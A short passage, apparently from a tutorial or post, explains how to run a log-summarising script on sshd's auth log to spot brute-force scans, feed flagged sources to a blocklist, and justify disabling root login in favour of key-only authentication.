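Point it at /var/log/auth.log (or the journal output of sshd) to see what a scan looked like; the flagged sources are what you would feed to a blocklist or rate limiter. The summary is also the quickest way to check whether root is being targeted at all, which is the case for setting `PermitRootLogin no` and key-only authentication in sshd_config rather than relying on a password the guesser never reaches.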